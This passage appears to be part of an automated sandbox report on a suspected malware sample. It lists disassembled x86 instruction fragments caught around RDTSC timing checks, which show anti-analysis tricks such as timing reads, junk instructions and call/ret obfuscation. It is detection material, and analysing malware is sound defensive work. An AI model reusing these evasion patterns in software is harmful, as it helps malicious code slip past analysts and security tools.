add dword ptr [esp+04h], 00000016h 0x00000073 inc esi 0x00000074 push esi 0x00000075 ret 0x00000076 pop esi 0x00000077 ret 0x00000078 mov dword ptr [ebp+12B94BE5h], eax 0x0000007e nop 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99BE4 second address: A99BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A99BE8 second address: A99BF2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA260E second address: AA2612 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2612 second address: AA2672 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FDC0050BD48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+129E2C39h] 0x0000002a push 00000000h 0x0000002c movzx ebx, di 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FDC0050BD48h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b adc di, BB2Ch 0x00000050 push eax 0x00000051 pushad 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2672 second address: AA2678 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA36E1 second address: AA371E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 push 00000000h 0x00000007 push ebx 0x00000008 call 00007FDC0050BD48h 0x0000000d pop ebx 0x0000000e mov dword ptr [esp+04h], ebx 0x00000012 add dword ptr [esp+04h], 0000001Bh 0x0000001a inc ebx 0x0000001b push ebx 0x0000001c ret 0x0000001d pop ebx 0x0000001e ret 0x0000001f mov bh, 16h 0x00000021 push 00000000h 0x00000023 movsx ebx, di 0x00000026 push 00000000h 0x00000028 mov bx, dx 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f push esi 0x00000030 pop esi 0x00000031 push ebx 0x00000032 pop ebx 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA371E second address: AA372D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA372D second address: AA373F instructions: 0x00000000 rdtsc 0x00000002 js 00007FDC0050BD46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA373F second address: AA3744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA278D second address: AA2791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2791 second address: AA2797 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA2797 second address: AA279B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA279B second address: AA279F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA3984 second address: AA39AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDC0050BD46h 0x00000009 jmp 00007FDC0050BD59h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA55F3 second address: AA55F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA68D9 second address: AA68DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA58C0 second address: AA58D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDC00CE27ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA7834 second address: AA7839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69E4 second address: AA69E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69E8 second address: AA69EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA69EE second address: AA6A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push dword ptr fs:[00000000h] 0x00000012 or dword ptr [ebp+12B77825h], edi 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov edi, 5B638ED3h 0x00000024 mov eax, dword ptr [ebp+129E0A8Dh] 0x0000002a mov dword ptr [ebp+129E35BAh], ecx 0x00000030 push FFFFFFFFh 0x00000032 pushad 0x00000033 sbb ax, 7D9Dh 0x00000038 mov dl, 03h 0x0000003a popad 0x0000003b nop 0x0000003c jmp 00007FDC00CE27B4h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 jmp 00007FDC00CE27B2h 0x0000004a pop eax 0x0000004b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA6A55 second address: AA6A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDC0050BD46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AA8686 second address: AA86F2 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDC00CE27A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push ebx 0x0000000e jmp 00007FDC00CE27AEh 0x00000013 pop edi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FDC00CE27A8h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 mov ebx, 66F320E9h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007FDC00CE27A8h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 push eax 0x00000052 pushad 0x00000053 push eax 0x00000054 push edx 0x00000055 push edi 0x00000056 pop edi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AAFBE0 second address: AAFBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AAFBE7 second address: AAFBF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27ABh 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A54A0C second address: A54A15 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A54A15 second address: A54A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jnp 00007FDC00CE27B2h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440C0 second address: A440D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Bh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440D0 second address: A440DC instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDC00CE27AEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440DC second address: A440E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A440E4 second address: A440F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FDC00CE27A6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB2DDD second address: AB2DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB2DE3 second address: AB2DF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB58C6 second address: AB58CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AB58CC second address: AB58D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF11 second address: ABEF2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FDC0050BD57h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF2E second address: ABEF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABEF34 second address: ABEF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF480 second address: ABF48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDC00CE27A6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF48D second address: ABF493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABF61B second address: ABF62F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDC00CE27B0h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ABFA4A second address: ABFA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Dh 0x00000009 jmp 00007FDC0050BD53h 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC0074 second address: AC0079 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC0079 second address: AC007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5A03 second address: AC5A07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5A07 second address: AC5A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDC0050BD46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007FDC0050BD4Ah 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5A1D second address: AC5A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jbe 00007FDC00CE27A6h 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC4868 second address: AC486D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC498A second address: AC4995 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC4995 second address: AC499D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC499D second address: AC49C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FDC00CE27AAh 0x0000000e jmp 00007FDC00CE27AEh 0x00000013 jng 00007FDC00CE27A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC4B19 second address: AC4B2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDC0050BD4Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC4B2C second address: AC4B4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnp 00007FDC00CE27A6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FDC00CE27C1h 0x00000012 jmp 00007FDC00CE27ADh 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC4B4E second address: AC4B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5262 second address: AC5268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC5268 second address: AC526D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC9929 second address: AC9954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FDC00CE27ABh 0x0000000a je 00007FDC00CE27A8h 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FDC00CE27AEh 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC9954 second address: AC995A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: AC995A second address: AC9972 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FDC00CE27A6h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pop esi 0x0000000f pushad 0x00000010 jng 00007FDC00CE27A6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4251B second address: A4251F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A4251F second address: A42530 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDC00CE27A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A42530 second address: A42547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDC0050BD4Ah 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A42547 second address: A42551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A42551 second address: A42567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDC0050BD46h 0x0000000a jmp 00007FDC0050BD4Bh 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: ACF40A second address: ACF40E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95662 second address: A95666 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95666 second address: A956C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FDC00CE27AAh 0x0000000f js 00007FDC00CE27A6h 0x00000015 popad 0x00000016 popad 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FDC00CE27A8h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000017h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 lea eax, dword ptr [ebp+12B9F414h] 0x00000038 mov dword ptr [ebp+129E1AB1h], edi 0x0000003e nop 0x0000003f pushad 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop eax 0x00000044 pushad 0x00000045 pushad 0x00000046 popad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A956C4 second address: A956D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A956D0 second address: A72BAC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 jo 00007FDC00CE27BFh 0x0000000e call 00007FDC00CE27B2h 0x00000013 or dword ptr [ebp+129E35BAh], eax 0x00000019 pop edx 0x0000001a call 00007FDC00CE27B3h 0x0000001f mov edx, 1DC573E6h 0x00000024 pop ecx 0x00000025 call dword ptr [ebp+129E190Bh] 0x0000002b jmp 00007FDC00CE27AFh 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FDC00CE27B9h 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95B05 second address: A95B22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95E85 second address: A95EC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FDC00CE27ACh 0x00000011 pop edx 0x00000012 xchg eax, esi 0x00000013 mov ecx, dword ptr [ebp+129E2A85h] 0x00000019 nop 0x0000001a jmp 00007FDC00CE27ACh 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jne 00007FDC00CE27A6h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FA3 second address: A95FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FA7 second address: A95FAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FAB second address: A95FC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDC0050BD51h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FC5 second address: A95FCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FCB second address: A95FE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FDC0050BD46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A95FE0 second address: A96007 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC00CE27B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jnp 00007FDC00CE27A6h 0x00000010 pop ebx 0x00000011 popad 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A96108 second address: A9610F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A9610F second address: A96115 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A96115 second address: A96119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A965D3 second address: A965D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\joE9s9sbv0.exeRDTSC instruction interceptor: First address: A965D7 second address: A965EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDC0050BD4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
